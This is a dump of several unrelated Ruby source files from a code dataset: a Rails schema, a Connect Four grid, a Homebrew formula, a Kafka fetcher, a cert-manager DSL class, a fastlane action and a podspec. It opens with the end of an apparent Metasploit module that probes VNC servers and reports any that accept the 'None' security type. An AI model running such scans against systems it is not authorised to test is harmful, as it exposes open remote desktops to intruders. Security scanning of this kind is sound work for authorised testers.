:proto => 'tcp',
:name => 'vnc',
:info => "VNC protocol version #{ver}"
)
type = vnc.negotiate_authentication
if not type
raise RuntimeError.new("Auth negotiation failed: #{vnc.error}")
end
# Show the allowed security types
sec_type = []
vnc.auth_types.each { |type|
sec_type << Rex::Proto::RFB::AuthType.to_s(type)
}
print_status("#{target_host}:#{rport}, VNC server security types supported : #{sec_type.join(",")}")
if (vnc.auth_types.include? Rex::Proto::RFB::AuthType::None)
print_good("#{target_host}:#{rport}, VNC server security types includes None, free access!")
report_vuln(
{
:host => rhost,
:service => svc,
:name => self.name,
:info => "Module #{self.fullname} identified the VNC 'none' security type: #{sec_type.join(", ")}",
:refs => self.references,
:exploited_at => Time.now.utc
})
end
rescue RuntimeError
print_error("#{target_host}:#{rport}, #{$!}")
raise $!
ensure
disconnect
end
end
end
| 27.108696 | 119 | 0.558941 |
ac74ca82ea8c5e62e7564bb29c660d4c5c025310 | 1,006 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20_210_312_124_849) do
create_table 'users', force: :cascade do |t|
t.string 'username'
t.string 'email'
t.string 'password'
t.datetime 'created_at', precision: 6, null: false
t.datetime 'updated_at', precision: 6, null: false
end
end
| 45.727273 | 86 | 0.764414 |
e93a3974e44b307e9a9b93fbe7dac775eb702b11 | 1,098 | class Grid
attr_reader :columns, :width, :height
def initialize(width, height)
@width = width
@height = height
@columns = Array.new(width) { Array.new(height) }
end
def push(token, column)
raise ArgumentError if column >= @width
return if column_full?(column)
@columns[column][next_row_index(column)] = token
end
# The grid consists of columns starting from bottom left:
# 0,2 1,2 2,2
# 0,1 1,1 2,1
# 0,0 1,0 2,0
def to_a
@columns
end
def to_colorful_string(highlighted_character = "")
@columns.transpose.map { |row|
row.map { |token|
token_display = token ? "◉ " : " "
if token && defined? Paint
token_display = Paint[token_display, Digest::SHA2.hexdigest(token)[0..5]]
token_display = Paint[token_display, :bright, :underline] if token == highlighted_character
end
token_display
}.join("")
}.join("\n")
end
private
def column_full?(column)
@columns[column][-1] != nil
end
def next_row_index(column)
@columns[column].index(&:nil?)
end
end
| 21.96 | 101 | 0.623862 |
6122841b7690facab8485f05963ab4cbd2e96055 | 800 | class Primesieve < Formula
desc "Fast C/C++ prime number generator"
homepage "http://primesieve.org/"
url "https://github.com/kimwalisch/primesieve/archive/v6.2.tar.gz"
sha256 "c4d1c358ab95b370dcac317fe1820e41d60460b22e450359ebc4bdd507bb2547"
bottle do
cellar :any
sha256 "f03b9925f3e732b47989196b1a09ce1cefcd45c3181516630bdadd6de1549084" => :high_sierra
sha256 "6497a4d9e833a240271d2934c9726a36e971d08b1d5a0097901eb2e9a2d8bb1f" => :sierra
sha256 "b4d46e227db20da387247c244bf9a13dfe1c23b19b922cbcf20a4b47994eb059" => :el_capitan
end
depends_on "cmake" => :build
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args
system "make", "install"
end
end
test do
system "#{bin}/primesieve", "100", "--count", "--print"
end
end
| 29.62963 | 93 | 0.7375 |
f78b4669e14c8d67a7863457ba26ee87caea0f18 | 4,892 | # frozen_string_literal: true
require "kafka/fetch_operation"
module Kafka
class Fetcher
attr_reader :queue
def initialize(cluster:, logger:, instrumenter:, max_queue_size:, group:)
@cluster = cluster
@logger = logger
@instrumenter = instrumenter
@max_queue_size = max_queue_size
@group = group
@queue = Queue.new
@commands = Queue.new
@next_offsets = Hash.new { |h, k| h[k] = {} }
# Long poll until at least this many bytes can be fetched.
@min_bytes = 1
# Long poll at most this number of seconds.
@max_wait_time = 1
# The maximum number of bytes to fetch for any given fetch request.
@max_bytes = 10485760
# The maximum number of bytes to fetch per partition, by topic.
@max_bytes_per_partition = {}
@thread = Thread.new do
loop while true
end
@thread.abort_on_exception = true
end
def subscribe(topic, max_bytes_per_partition:)
@commands << [:subscribe, [topic, max_bytes_per_partition]]
end
def seek(topic, partition, offset)
@commands << [:seek, [topic, partition, offset]]
end
def configure(min_bytes:, max_bytes:, max_wait_time:)
@commands << [:configure, [min_bytes, max_bytes, max_wait_time]]
end
def start
@commands << [:start, []]
end
def handle_start
raise "already started" if @running
@running = true
end
def stop
@commands << [:stop, []]
end
def reset
@commands << [:reset, []]
end
def data?
[email protected]?
end
def poll
@queue.deq
end
private
def loop
@instrumenter.instrument("loop.fetcher", {
queue_size: @queue.size,
})
if [email protected]?
cmd, args = @commands.deq
@logger.debug "Handling fetcher command: #{cmd}"
send("handle_#{cmd}", *args)
elsif !@running
sleep 0.1
elsif @queue.size < @max_queue_size
step
else
@logger.warn "Reached max fetcher queue size (#{@max_queue_size}), sleeping 1s"
sleep 1
end
end
def handle_configure(min_bytes, max_bytes, max_wait_time)
@min_bytes = min_bytes
@max_bytes = max_bytes
@max_wait_time = max_wait_time
end
def handle_reset
@next_offsets.clear
@queue.clear
end
def handle_stop(*)
@running = false
# After stopping, we need to reconfigure the topics and partitions to fetch
# from. Otherwise we'd keep fetching from a bunch of partitions we may no
# longer be assigned.
handle_reset
end
def handle_subscribe(topic, max_bytes_per_partition)
@logger.info "Will fetch at most #{max_bytes_per_partition} bytes at a time per partition from #{topic}"
@max_bytes_per_partition[topic] = max_bytes_per_partition
end
def handle_seek(topic, partition, offset)
@instrumenter.instrument('seek.consumer',
group_id: @group.group_id,
topic: topic,
partition: partition,
offset: offset)
@logger.info "Seeking #{topic}/#{partition} to offset #{offset}"
@next_offsets[topic][partition] = offset
end
def step
batches = fetch_batches
batches.each do |batch|
unless batch.empty?
@instrumenter.instrument("fetch_batch.consumer", {
topic: batch.topic,
partition: batch.partition,
offset_lag: batch.offset_lag,
highwater_mark_offset: batch.highwater_mark_offset,
message_count: batch.messages.count,
})
end
@next_offsets[batch.topic][batch.partition] = batch.last_offset + 1
end
@queue << [:batches, batches]
rescue Kafka::NoPartitionsToFetchFrom
@logger.warn "No partitions to fetch from, sleeping for 1s"
sleep 1
rescue Kafka::Error => e
@queue << [:exception, e]
end
def fetch_batches
@logger.debug "Fetching batches"
operation = FetchOperation.new(
cluster: @cluster,
logger: @logger,
min_bytes: @min_bytes,
max_bytes: @max_bytes,
max_wait_time: @max_wait_time,
)
@next_offsets.each do |topic, partitions|
# Fetch at most this many bytes from any single partition.
max_bytes = @max_bytes_per_partition[topic]
partitions.each do |partition, offset|
operation.fetch_from_partition(topic, partition, offset: offset, max_bytes: max_bytes)
end
end
operation.execute
rescue NoPartitionsToFetchFrom
backoff = @max_wait_time > 0 ? @max_wait_time : 1
@logger.info "There are no partitions to fetch from, sleeping for #{backoff}s"
sleep backoff
[]
end
end
end
| 25.612565 | 110 | 0.612428 |
878ad4b650cd41de4bd4ba50bccdc4c34f81df58 | 1,385 | # typed: true
module Kuby
module CertManager
module DSL
module CertManager
module V1
class IssuerStatusConditions < ::KubeDSL::DSLObject
value_field :status
value_field :observed_generation
value_field :last_transition_time
value_field :reason
value_field :message
value_field :type
validates :status, field: { format: :string }, presence: true
validates :observed_generation, field: { format: :integer }, presence: true
validates :last_transition_time, field: { format: :string }, presence: false
validates :reason, field: { format: :string }, presence: false
validates :message, field: { format: :string }, presence: false
validates :type, field: { format: :string }, presence: true
def serialize
{}.tap do |result|
result[:status] = status
result[:observedGeneration] = observed_generation
result[:lastTransitionTime] = last_transition_time
result[:reason] = reason
result[:message] = message
result[:type] = type
end
end
def kind_sym
:issuer_status_conditions
end
end
end
end
end
end
end | 32.97619 | 88 | 0.561011 |
f7f23dac73b148e70eca59056d27be810a296504 | 741 | module Fastlane
module Actions
module SharedValues
end
class FastlaneVersionAction
def self.run(params)
defined_version = ((Gem::Version.new(params.first) if params.first) rescue nil)
raise "Please pass minimum fastlane version as parameter to fastlane_version".red unless defined_version
if Gem::Version.new(Fastlane::VERSION) < defined_version
raise "The Fastfile requires a fastlane version of >= #{defined_version}. You are on #{Fastlane::VERSION}. Please update using `sudo gem update fastlane`.".red
end
Helper.log.info "fastlane version valid"
end
def self.step_text
"Verifying required fastlane version"
end
end
end
end
| 29.64 | 169 | 0.682861 |
1812573e78acb631686d32c8b4f49dd0a0cb0703 | 719 | Pod::Spec.new do |s|
s.name = "Then"
s.version = "2.7.0"
s.summary = "Super sweet syntactic sugar for Swift initializers."
s.homepage = "https://github.com/tworingsoft/Then"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Suyeol Jeon" => "[email protected]" }
s.source = { :git => "https://github.com/tworingsoft/Then.git",
:tag => s.version.to_s }
s.source_files = "Sources/Then/*.swift"
s.requires_arc = true
s.swift_version = "5.0"
s.ios.deployment_target = "8.0"
s.osx.deployment_target = "10.9"
s.tvos.deployment_target = "9.0"
s.watchos.deployment_target = "2.0"
end
| 37.842105 | 76 | 0.557719 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.